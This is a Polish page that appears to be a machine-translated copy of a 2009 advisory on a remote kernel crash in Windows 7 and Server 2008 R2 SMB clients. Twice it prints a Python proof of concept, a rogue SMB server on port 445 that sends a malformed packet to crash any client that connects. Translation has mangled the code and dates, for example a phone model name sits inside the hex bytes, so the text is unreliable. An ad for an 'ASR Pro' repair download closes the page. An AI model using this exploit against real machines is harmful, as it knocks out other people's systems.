Table of Contents
Zatwierdzone
Jeśli zdalne jądro systemu Windows 7 / Server 2008r2 ulega awarii na Twoim komputerze, mamy nadzieję, że ten indywidualny przewodnik pomoże Ci rozwiązać ten problem. g.Nieskończona pętla klienta Microsoft Windows 7 lub Server 2008 R2 SMB: Wykorzystuje awarię wykonywania operacji w kliencie Microsoft Windows SMB w systemie Windows 7 lub nowszym Windows Server 2008 R2. Najczęściej zawodzi zdalne jądro. Metasploit Framework zawiera moduł do wykrywania mojej luki w zabezpieczeniach.
g.
numer! / usr / bin kontra python# win7-crash.Trigger py:# awaria zdalnego jądra zlokalizowana na serwerze hosta Win7 i 2008R2 (nieskończona pętla)# Awarie KeAccumulateTicks (), w których NT_ASSERT () / DbgRaiseAssertionFailure () przyczyniły się do# Niekończący się cykl.# BRAK BSOD, MUSISZ ODŁĄCZYĆ ZŁĄCZE.# Aby szybko to nazwać; w kolejności: this_script_ip_addr BLAH, awaria bez wysiłku# Autor: Laurent Gaffi¯ ¿ ½Importuj serwer gniazdPakiet jest równy (długość numeru " x00 x00 x00 x9a" ---> musi być zawsze 9, a nie 9a .." xfe x53 x4d x42 x40 x00 x00 x00 x00 x00 x00 x00 x00 x00 x01 x00"" x01 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00"" x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00"" x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00"" x41 x00 x01 x00 x02 x02 x00 x00 x30 x82 xa4 x11 xe3 x12 x23 x41"" xaa x4b xad x99 xfd x52 x31 x8d x01 x00 x00 x00 x00 x00 x01 x00"" x00 x00 x01 x00 x00 x00 x01 x00 xcf x73 x67 x74 x62 x60 xca x01"" xcb x51 xe0 x19 x62 x60 xca x01 x80 x00 x1e x00 x20 x4c x4d x20"" x60 x1c x06 x06 x2b x06 x01 x05 x05 x02 xa0 x12 x30 x10 xa0 x0e"" x30 x0c x06 x0a x2b x06 x01 x04 x01 x82 x37 x02 x02 x0a")Sesja SMB2 (SocketServer.BaseRequestHandler): Def-Handle (sama): wzorzec "Kto:", self.client_address Użyj „Dzięki SDL” Wpis sugeruje self.request.recv (1024) self.request.send (pakiet) samo.żądanie.zamknij ()uruchom = SocketServer.TCPServer (('', 445), SMB2) # słuchaj po wszystkich interfejsach miasto 445uruchom.serve_forever ()
Ten błąd jest interesującym dowodem na to, że SDL FAIL
Cierpiącym na błąd jest nieograniczona pętla na smb1,2, wstępne uwierzytelnianie, wymagane są tylko pełne dane uwierzytelniające…
Można uruchomić w sieci lokalnej przez (IE *)
Błąd prawdopodobnie musi być tak prosty, że powinien zostać odkryty 2 lata temu na określonym SDL, jeśli SDL już istniał:
netbios_header = struct.pack (“> i”, len (”. join (SMB_packet)) + SMB_packet
(Tagi h2 netbios przekazują długość współczesnego pakietu smb1,2).
Jeśli liczba netbios_header jest rzeczywiście o 4 bajty mniejsza lub większa niż SMB_packet, sytuacja jest po prostu haniebna!
JAKI RODZAJ ?? Żartujesz sobie, gdzie jest mój SDL?!?
“Najbezpieczniejszy system operacyjny do czynienia ze światłem. е “;
To, że poprawnie skonfigurowano firewall, powinno być bardzo usunięte przez IE, nawet za pomocą metody rozgłaszania nbns (bez interakcji użytkownika)
================================================
– Data wydania: 11 listopada 2009
– Odkryte przez: Laurent Gaffier
– Dotkliwość: średnia / niezwykła
==============================================
NS. POTWIERDZENIE KONCEPCJI
————————–
# win7-crash.py:
# Uruchamianie prawdziwej odległej awarii jądra pod Win7, a tym samym Server 2008R2 (nieskończona pętla)
# KeAccumulateTicks () uległ awarii z powodu NT_ASSERT () w porównaniu z DbgRaiseAssertionFailure () spowodowane przez # głęboką nieskończoną pętlę.
# BEZ BSOD, MASZ KOREK.
# Aby szybko się z tym zmierzyć; w kolejności: this_script_ip_addr BLAH, zmniejsz natychmiast
# Wysłane przez Laurenta Gaffiera
#
Pakiet równa się (numer ” x00 x00 x00 x9a” —> 9-ty okres powinien tak naprawdę wynosić 9a ..
” xfe x53 x4d x42 x40 x00 x00 x00 x00 x00 x00 x00 x00 x00 x01 x00″
” x01 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″
” x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″
” x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00″
” x41 x00 x01 x00 x02 x02 x00 x00 x30 x82 xa4 x11 xe3 x12 x23 x41″
” xaa x4b xad x99 xfd x52 x31 x8d x01 x00 x00 x00 x00 x00 x01 x00 “
” x00 x00 x01 x00 x00 x00 x01 x00 xcf x73 x67 x74 x62 x60 xca x01″
” xcb x51 xe0 x19 x62 x60 xca x01 x80 x00 x1e x00 x20 x4c x4d x20″
” x60 x1c x06 x06 x2b x06 x01 x05 x05 x02 xa0 x12 x30 sony ericsson xperia x10 xa0 x0e”
” x30 x0c x06 x0a x2b x06 x01 x04 x01 x82 x37 x02 x02 x0a”)
V. WPŁYW KOMERCYJNY
————————–
Atakujący może zdalnie wyłączyć wiele serwerów Windows 2008R2 Server 7 dla każdego
w sieci lokalnej lub przez IE
VII. Rozwiązanie poprawki
————————–
nigdy nie jest dostępny dla tej instancji, Twój dostawca usług internetowych nie dba o to.
Zamknij funkcję SMB, ale także porty, dopóki nie zostanie wyświetlony prawidłowy audyt.
X. HISTORIA ZMIAN
————————–
8 listopada 2009: MSRC skontaktował się z
Kilka listopada 2009: MSRC wykryła lukę w zabezpieczeniach
18 listopada 2009: MRSC próbuje mnie przekonać, ponieważ istnieje błąd IPv6 od różnych dostawców, który naprawdę nie powinien pojawiać się w biuletynach bezpieczeństwa.
11 listopada 2009: Ten cenny błąd został wydany.
XI. UWAGI
————————–
Zatwierdzone informacje zawarte w niniejszym dokumencie są dostarczane „tak jak są”
bez oświadczeń mogą być gwarancje celowości lub inaczej.
Nie powinienem akceptować żadnych uszkodzeń wprowadzonych przez operatora lub
Nadużycie najczęściej związane z tymi informacjami.
Pełne ujawnienieArchiwa list mailingowych
Awaria zdalnego jądra Windows 7 Server 2008R2
Data: gmail środa 11 listopada 2006 05:58:44 – 05:00
________________________________________________PłećMoje ujawnienie dokumentów - zaufaj już teraz.Karta: http://lists.grok.org.uk/full-disclosure-charter.htmlWłaśnie pozycjonowane i sponsorowane przez Secunia Http: // secunia-.com/
Przez randki By Drut
Bieżący strumień:
- Windows Server 2008R2 Potężny zdalny awaria jądra autorstwa Laurenta Gaffy’ego (11 listopada)
Zatwierdzone
Narzędzie naprawcze ASR Pro to rozwiązanie dla komputera z systemem Windows, który działa wolno, ma problemy z rejestrem lub jest zainfekowany złośliwym oprogramowaniem. To potężne i łatwe w użyciu narzędzie może szybko zdiagnozować i naprawić komputer, zwiększając wydajność, optymalizując pamięć i poprawiając bezpieczeństwo procesu. Nie cierpisz już z powodu powolnego komputera — wypróbuj ASR Pro już dziś!
Oprogramowanie do naprawy komputera to tylko jedno kliknięcie - pobierz je teraz.